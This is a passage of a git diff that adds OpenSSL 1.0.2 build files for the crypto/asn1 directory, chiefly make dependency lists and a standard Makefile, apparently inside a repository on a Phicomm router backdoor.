+t_x509a.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+t_x509a.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+t_x509a.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+t_x509a.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+t_x509a.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+t_x509a.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+t_x509a.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+t_x509a.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+t_x509a.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+t_x509a.o: ../../include/openssl/x509_vfy.h ../cryptlib.h t_x509a.c
+tasn_dec.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_dec.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tasn_dec.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tasn_dec.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+tasn_dec.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tasn_dec.o: ../../include/openssl/opensslconf.h
+tasn_dec.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_dec.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_dec.o: ../../include/openssl/symhacks.h tasn_dec.c
+tasn_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+tasn_enc.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+tasn_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tasn_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_enc.o: ../../include/openssl/symhacks.h ../cryptlib.h tasn_enc.c
+tasn_fre.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_fre.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_fre.o: ../../include/openssl/e_os2.h ../../include/openssl/obj_mac.h
+tasn_fre.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_fre.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_fre.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_fre.o: ../../include/openssl/symhacks.h tasn_fre.c
+tasn_new.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_new.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_new.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_new.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_new.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_new.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_new.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_new.o: ../../include/openssl/symhacks.h tasn_new.c
+tasn_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+tasn_prn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+tasn_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+tasn_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tasn_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tasn_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tasn_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tasn_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tasn_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+tasn_prn.o: ../cryptlib.h asn1_locl.h tasn_prn.c
+tasn_typ.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_typ.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_typ.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+tasn_typ.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_typ.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_typ.o: ../../include/openssl/symhacks.h tasn_typ.c
+tasn_utl.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_utl.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_utl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_utl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_utl.o: ../../include/openssl/symhacks.h tasn_utl.c
+x_algor.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_algor.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_algor.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_algor.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_algor.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_algor.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_algor.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_algor.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_algor.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_algor.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_algor.o: x_algor.c
+x_attrib.o: ../../e_os.h ../../include/openssl/asn1.h
+x_attrib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_attrib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_attrib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_attrib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_attrib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_attrib.o: ../../include/openssl/opensslconf.h
+x_attrib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_attrib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_attrib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_attrib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_attrib.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x_attrib.c
+x_bignum.o: ../../e_os.h ../../include/openssl/asn1.h
+x_bignum.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_bignum.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x_bignum.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_bignum.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+x_bignum.o: ../../include/openssl/opensslconf.h
+x_bignum.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_bignum.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+x_bignum.o: ../../include/openssl/symhacks.h ../cryptlib.h x_bignum.c
+x_crl.o: ../../e_os.h ../../include/openssl/asn1.h
+x_crl.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_crl.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_crl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_crl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_crl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_crl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_crl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_crl.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_crl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_crl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_crl.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x_crl.o: ../cryptlib.h asn1_locl.h x_crl.c
+x_exten.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_exten.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_exten.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_exten.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_exten.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_exten.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_exten.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_exten.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_exten.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_exten.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_exten.o: x_exten.c
+x_info.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x_info.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_info.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_info.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_info.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_info.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_info.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_info.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_info.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_info.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_info.o: ../cryptlib.h x_info.c
+x_long.o: ../../e_os.h ../../include/openssl/asn1.h
+x_long.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_long.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x_long.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_long.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+x_long.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_long.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+x_long.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_long.o: ../cryptlib.h x_long.c
+x_name.o: ../../e_os.h ../../include/openssl/asn1.h
+x_name.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_name.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_name.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_name.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_name.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_name.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_name.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_name.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_name.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_name.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_name.o: ../cryptlib.h asn1_locl.h x_name.c
+x_nx509.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_nx509.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_nx509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_nx509.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_nx509.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_nx509.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_nx509.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_nx509.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_nx509.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_nx509.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_nx509.o: x_nx509.c
+x_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+x_pkey.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+x_pkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_pkey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_pkey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_pkey.o: ../cryptlib.h x_pkey.c
+x_pubkey.o: ../../e_os.h ../../include/openssl/asn1.h
+x_pubkey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_pubkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_pubkey.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+x_pubkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_pubkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_pubkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_pubkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_pubkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+x_pubkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_pubkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_pubkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_pubkey.o: ../cryptlib.h asn1_locl.h x_pubkey.c
+x_req.o: ../../e_os.h ../../include/openssl/asn1.h
+x_req.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_req.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_req.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_req.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_req.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_req.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_req.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_req.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_req.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_req.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_req.o: ../cryptlib.h x_req.c
+x_sig.o: ../../e_os.h ../../include/openssl/asn1.h
+x_sig.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_sig.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_sig.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_sig.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_sig.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_sig.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_sig.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_sig.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_sig.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_sig.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_sig.o: ../cryptlib.h x_sig.c
+x_spki.o: ../../e_os.h ../../include/openssl/asn1.h
+x_spki.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_spki.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_spki.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_spki.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_spki.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_spki.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_spki.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_spki.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_spki.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_spki.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_spki.o: ../cryptlib.h x_spki.c
+x_val.o: ../../e_os.h ../../include/openssl/asn1.h
+x_val.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_val.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_val.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_val.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_val.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_val.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_val.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_val.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_val.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_val.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_val.o: ../cryptlib.h x_val.c
+x_x509.o: ../../e_os.h ../../include/openssl/asn1.h
+x_x509.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_x509.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_x509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_x509.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_x509.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_x509.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x_x509.o: ../cryptlib.h x_x509.c
+x_x509a.o: ../../e_os.h ../../include/openssl/asn1.h
+x_x509a.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_x509a.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_x509a.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_x509a.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_x509a.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_x509a.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_x509a.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_x509a.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_x509a.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_x509a.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_x509a.o: ../cryptlib.h x_x509a.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.save
new file mode 100644
index 0000000..7b26324
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.save
@@ -0,0 +1,876 @@
+#
+# OpenSSL/crypto/asn1/Makefile
+#
+
+DIR=	asn1
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	a_object.c a_bitstr.c a_utctm.c a_gentm.c a_time.c a_int.c a_octet.c \
+	a_print.c a_type.c a_set.c a_dup.c a_d2i_fp.c a_i2d_fp.c \
+	a_enum.c a_utf8.c a_sign.c a_digest.c a_verify.c a_mbstr.c a_strex.c \
+	x_algor.c x_val.c x_pubkey.c x_sig.c x_req.c x_attrib.c x_bignum.c \
+	x_long.c x_name.c x_x509.c x_x509a.c x_crl.c x_info.c x_spki.c nsseq.c \
+	x_nx509.c d2i_pu.c d2i_pr.c i2d_pu.c i2d_pr.c\
+	t_req.c t_x509.c t_x509a.c t_crl.c t_pkey.c t_spki.c t_bitst.c \
+	tasn_new.c tasn_fre.c tasn_enc.c tasn_dec.c tasn_utl.c tasn_typ.c \
+	tasn_prn.c ameth_lib.c \
+	f_int.c f_string.c n_pkey.c \
+	f_enum.c x_pkey.c a_bool.c x_exten.c bio_asn1.c bio_ndef.c asn_mime.c \
+	asn1_gen.c asn1_par.c asn1_lib.c asn1_err.c a_bytes.c a_strnid.c \
+	evp_asn1.c asn_pack.c p5_pbe.c p5_pbev2.c p8_pkey.c asn_moid.c
+LIBOBJ= a_object.o a_bitstr.o a_utctm.o a_gentm.o a_time.o a_int.o a_octet.o \
+	a_print.o a_type.o a_set.o a_dup.o a_d2i_fp.o a_i2d_fp.o \
+	a_enum.o a_utf8.o a_sign.o a_digest.o a_verify.o a_mbstr.o a_strex.o \
+	x_algor.o x_val.o x_pubkey.o x_sig.o x_req.o x_attrib.o x_bignum.o \
+	x_long.o x_name.o x_x509.o x_x509a.o x_crl.o x_info.o x_spki.o nsseq.o \
+	x_nx509.o d2i_pu.o d2i_pr.o i2d_pu.o i2d_pr.o \
+	t_req.o t_x509.o t_x509a.o t_crl.o t_pkey.o t_spki.o t_bitst.o \
+	tasn_new.o tasn_fre.o tasn_enc.o tasn_dec.o tasn_utl.o tasn_typ.o \
+	tasn_prn.o ameth_lib.o \
+	f_int.o f_string.o n_pkey.o \
+	f_enum.o x_pkey.o a_bool.o x_exten.o bio_asn1.o bio_ndef.o asn_mime.o \
+	asn1_gen.o asn1_par.o asn1_lib.o asn1_err.o a_bytes.o a_strnid.o \
+	evp_asn1.o asn_pack.o p5_pbe.o p5_pbev2.o p8_pkey.o asn_moid.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  asn1.h asn1_mac.h asn1t.h
+HEADER=	$(EXHEADER) asn1_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:	test.c
+	cc -g -I../../include -c test.c
+	cc -g -I../../include -o test test.o -L../.. -lcrypto
+
+pk:	pk.c
+	cc -g -I../../include -c pk.c
+	cc -g -I../../include -o pk pk.o -L../.. -lcrypto
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by top Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+a_bitstr.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bitstr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_bitstr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_bitstr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_bitstr.o: ../../include/openssl/opensslconf.h
+a_bitstr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_bitstr.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_bitstr.o: ../../include/openssl/symhacks.h ../cryptlib.h a_bitstr.c
+a_bool.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bool.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+a_bool.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_bool.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_bool.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_bool.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_bool.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_bool.o: ../../include/openssl/symhacks.h ../cryptlib.h a_bool.c
+a_bytes.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bytes.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_bytes.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_bytes.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_bytes.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_bytes.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_bytes.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_bytes.o: ../cryptlib.h a_bytes.c
+a_d2i_fp.o: ../../e_os.h ../../include/openssl/asn1.h
+a_d2i_fp.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+a_d2i_fp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_d2i_fp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_d2i_fp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_d2i_fp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_d2i_fp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_d2i_fp.o: ../../include/openssl/symhacks.h ../cryptlib.h a_d2i_fp.c
+a_digest.o: ../../e_os.h ../../include/openssl/asn1.h
+a_digest.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_digest.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_digest.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+a_digest.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_digest.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_digest.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_digest.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_digest.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_digest.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_digest.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_digest.c
+a_dup.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_dup.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_dup.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_dup.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_dup.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_dup.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_dup.o: ../../include/openssl/symhacks.h ../cryptlib.h a_dup.c
+a_enum.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_enum.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_enum.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_enum.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_enum.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_enum.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_enum.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_enum.o: ../cryptlib.h a_enum.c
+a_gentm.o: ../../e_os.h ../../include/openssl/asn1.h
+a_gentm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_gentm.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_gentm.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_gentm.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_gentm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_gentm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_gentm.o: ../cryptlib.h ../o_time.h a_gentm.c asn1_locl.h
+a_i2d_fp.o: ../../e_os.h ../../include/openssl/asn1.h
